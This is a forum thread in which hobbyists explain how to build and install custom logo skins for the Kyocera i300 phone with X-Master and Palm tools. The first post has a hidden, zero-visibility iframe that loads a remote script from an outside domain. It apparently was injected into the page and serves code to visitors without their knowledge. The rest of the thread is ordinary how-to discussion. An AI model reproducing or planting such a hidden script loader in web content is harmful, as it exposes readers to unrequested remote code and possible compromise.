I'm running X-master and the i330 skin selector on my i300. My question is this: Where can I find more logo hacks? I have the logo hack extention for X-master, yet it only comes with 2 skins. The skin selector doesn't list them as an option, nor are they avaliable from http://www.i330.nopdesign.com , the site I normally get my graffiti and phone skins from. Where can I find more? I have tons of other skins, but am stuck w/ the US flag banner for my logo. It's cool and all, but it would be nice to have a little variety for my banner.

By the way, if you haven't picked up any skin extentions for your phone you are missing out. They are way coolio.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I make all my logos for the logo hack using this:

It's really easy. If you need some help on making your own just let me know and I can walk you through it.

How hard is it? I was reading over those directions and got kinda confused. I don't wanna mess it up and kill my phone or anything. I already have a little bmp that I wan to use just don't completely understand the instructions...

To create a logo...

I will make this easy for you.

Before anything create a FOLDER in your C: directory of your hard drive and call it logoskin

C:\logoskin

Now download this:
http://www.geocities.com/blairerickson/QuickSkinKit.zip
and unzip... (unzip it in C:\logoskin)

Then, download this:
http://www.geocities.com/tvstj/i300/makemod.zip
and unzip in the same directory as you did the first download (C:\logoskin).


OK...now open up your photo editing software that you use(i.e.Paint Shop Pro, PhotoShop, etc) and resize your image to 160x38 and save it as a BMP in the C:\logoskin directory. To make it simple, label the bmp mylogoskin.bmp

Now...go to the C:\logoskin directory and look for the file YourLogos.rcp re-name this mylogoskin.rcp

Next, re-name mylogoskin.rcp to mylogoskin.rcp.txt

Now double click it and Notepad should open up. Delete everything in there and add this instead:

STRING ID 1000 "mylogoskin"

BITMAPCOLOR ID 2000 "mylogoskin.bmp" COMPRESS

and click FILE - SAVE (to save it)

Now rename it back to: mylogoskin.rcp (just take the .txt on the end out)

OK...now open up your DOS prompt. In Windows XP - GO to Start - Programs - Accessories - Command Prompt

Now type: cd c:\ (and then hit enter)

Now type: cd c:\logoskin

Now type: makelogomod mylogoskin

(dont forget the space between makelogomod and mylogoskin)

after that, it will create a file in the c:\logoskin directory called: i300-Logo-mylogoskin.prc

Double click this and Palm Quick Install will open up. Now hot sync and the logo skin is now on your phone.

Go to X - Master - i300 logo hack - and click configure. Hit Next Collection until you see your logo then hit OK.

You have now created and installed your very own Logo.

I'm having problems with the Logo hack.

I followed Jake's, Blaire Ericson's, and also yours but still no go.

I'm not getting the Logo Hack selection when I open Xmaster.

I presently have the the i300 Alarm Extension, i300 Shutup Extension, and i300 Skin Extension loaded.

When I do the Hotsynch, I see on the palm screen that it's loading my the logo hack, but for some reason I can't get to it since it is not appearing in Xmaster.

Any help would be appreciated.

hmm..ok..well..lets walk through this.

I am using X-Master 1.5

Download and install that first if you haven't already.

Then...

Download this:

Install both the i300LogoHack.prc and the logos.prc (so you can at least test and see these logos)

Hot sync them to the phone when Palm Quick Install has them que'd up.

Click on X Master

Make sure I300 Logo Hack is CHECKED.

Highlight it and click configure.

Go through the logos and pick one that you want and then hit OK.

If you dont see it now...

DO THIS:

Go to PREFS...then PHONE PREFS...then DISPLAY... for greeting select Logo

Exit it out and now you should see it.

I was missing the i300Logohack.prc file.

I loaded that and the selection came right up.

Question: I've loaded set of logo files to the i300:

* Sample logo files (logos.prc)
* My first set of logos
* My 2nd set of logos

I'd like to remove the first two set since I either won't be using them or in the case of my first set of logos, the image isn't good enough to use.

Scott's phone/graffiti hacks have a Delete function. The logo hack doesn't appear to have one. Is there another way then to remove logo files?

Yes.

The same way you delete a program from the phone is the way you remove the logo for the logo hack.

In launcher...click the time on the upper left of the screen...App should highlight and now click Delete. Then scroll down and delete the file "I300-whatever the logo is called"

Thats it. It is now deleted from the phone.
